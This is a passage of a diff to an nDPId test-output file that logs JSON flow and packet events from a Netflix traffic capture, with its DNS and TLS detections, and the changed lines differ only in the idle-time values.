00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6726,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319117538,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.41.30.5"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117605,"flow_last_seen":1484319117605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117605,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1484319117605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117605,"pkt":"gCqoTGHM5JjWH70UCABFAABArFRAAEAGeobAqAEHNCkeBc\/3Abv7qhZTAAAAALAC\/\/8qUQAAAgQFtAEDAwUBAQgKH2X1uAAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117651,"flow_last_seen":1484319117651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117651,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1484319117651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117651,"pkt":"gCqoTGHM5JjWH70UCABFAABAO7RAAEAG8l7AqAEHNCAW1tAAAbtmeMEgAAAAALAC\/\/8btwAAAgQFtAEDAwUBAQgKH2X15gAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6758,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1484319117664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117664,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG7z\/fOmYqt+6oWVKASOJB9NwAAAgQFtAQCCAqh\/Yo1H2X1uAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6761,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1484319117667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117667,"pkt":"gCqoTGHM5JjWH70UCABFAAA0nQxAAEAGidrAqAEHNCkeBc\/3Abv7qhZUzpmKroAQEBXUQwAAAQEICh9l9fSh\/Yo1"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6764,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117605,"flow_last_seen":1484319117668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117668,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6772,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1484319117703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117703,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG70ABfA575ZnjBIaASOJAZDQAAAgQFtAQCCAq2sSZcH2X15gEDAwg="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6773,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1484319117704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117704,"pkt":"gCqoTGHM5JjWH70UCABFAAA0fsVAAEAGr1nAqAEHNCAW1tAAAbtmeMEhXwOe+oAQEBVwIwAAAQEICh9l9hi2sSZc"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6774,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117651,"flow_last_seen":1484319117713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117713,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6776,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117605,"flow_last_seen":1484319117737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117737,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6777,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117605,"flow_last_seen":1484319117738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3413,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1484319117738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6789,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117651,"flow_last_seen":1484319117770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117770,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6790,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117651,"flow_last_seen":1484319117771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319117771,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117826,"flow_last_seen":1484319117826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117826,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1484319117826,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117826,"pkt":"gCqoTGHM5JjWH70UCABFAABAF8hAAEAGDxPAqAEHNCkeBdABAbshc+whAAAAALAC\/\/8t3QAAAgQFtAEDAwUBAQgKH2X2iwAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117827,"flow_last_seen":1484319117827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1484319117827,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117827,"pkt":"gCqoTGHM5JjWH70UCABFAABADR1AAEAGGb7AqAEHNCkeBdACAbuRqNIFAAAAALAC\/\/\/XwQAAAgQFtAEDAwUBAQgKH2X2jAAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6809,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1484319117879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117879,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGPL80KR4FwKgBBwG70AFaPMiyIXPsIqASOJC25AAAAgQFtAQCCAqh\/YpsH2X2iwEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6810,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1484319117881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117881,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BiRAAEAGIMPAqAEHNCkeBdABAbshc+wiWjzIs4AQEBUN+QAAAQEICh9l9r+h\/Yps"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6811,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117826,"flow_last_seen":1484319117885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6812,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1484319117886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117886,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG70ALhlhIJkajSBqASOJCQFwAAAgQFtAQCCAqh\/YptH2X2jAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6813,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1484319117890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117890,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Pr9AAEAG6CfAqAEHNCkeBdACAbuRqNIG4ZYSCoAQEBXnJgAAAQEICh9l9sWh\/Ypt"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6814,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117827,"flow_last_seen":1484319117892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117892,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6821,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117826,"flow_last_seen":1484319117930,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117930,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6828,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117827,"flow_last_seen":1484319117942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117942,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117605,"flow_last_seen":1484319117605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117605,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1484319117605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117605,"pkt":"gCqoTGHM5JjWH70UCABFAABArFRAAEAGeobAqAEHNCkeBc\/3Abv7qhZTAAAAALAC\/\/8qUQAAAgQFtAEDAwUBAQgKH2X1uAAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117651,"flow_last_seen":1484319117651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117651,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1484319117651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117651,"pkt":"gCqoTGHM5JjWH70UCABFAABAO7RAAEAG8l7AqAEHNCAW1tAAAbtmeMEgAAAAALAC\/\/8btwAAAgQFtAEDAwUBAQgKH2X15gAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6758,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1484319117664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117664,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG7z\/fOmYqt+6oWVKASOJB9NwAAAgQFtAQCCAqh\/Yo1H2X1uAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6761,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1484319117667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117667,"pkt":"gCqoTGHM5JjWH70UCABFAAA0nQxAAEAGidrAqAEHNCkeBc\/3Abv7qhZUzpmKroAQEBXUQwAAAQEICh9l9fSh\/Yo1"} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6764,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117605,"flow_last_seen":1484319117668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117668,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6772,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1484319117703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117703,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG70ABfA575ZnjBIaASOJAZDQAAAgQFtAQCCAq2sSZcH2X15gEDAwg="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6773,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1484319117704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117704,"pkt":"gCqoTGHM5JjWH70UCABFAAA0fsVAAEAGr1nAqAEHNCAW1tAAAbtmeMEhXwOe+oAQEBVwIwAAAQEICh9l9hi2sSZc"} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6774,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117651,"flow_last_seen":1484319117713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117713,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6776,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117605,"flow_last_seen":1484319117737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117737,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 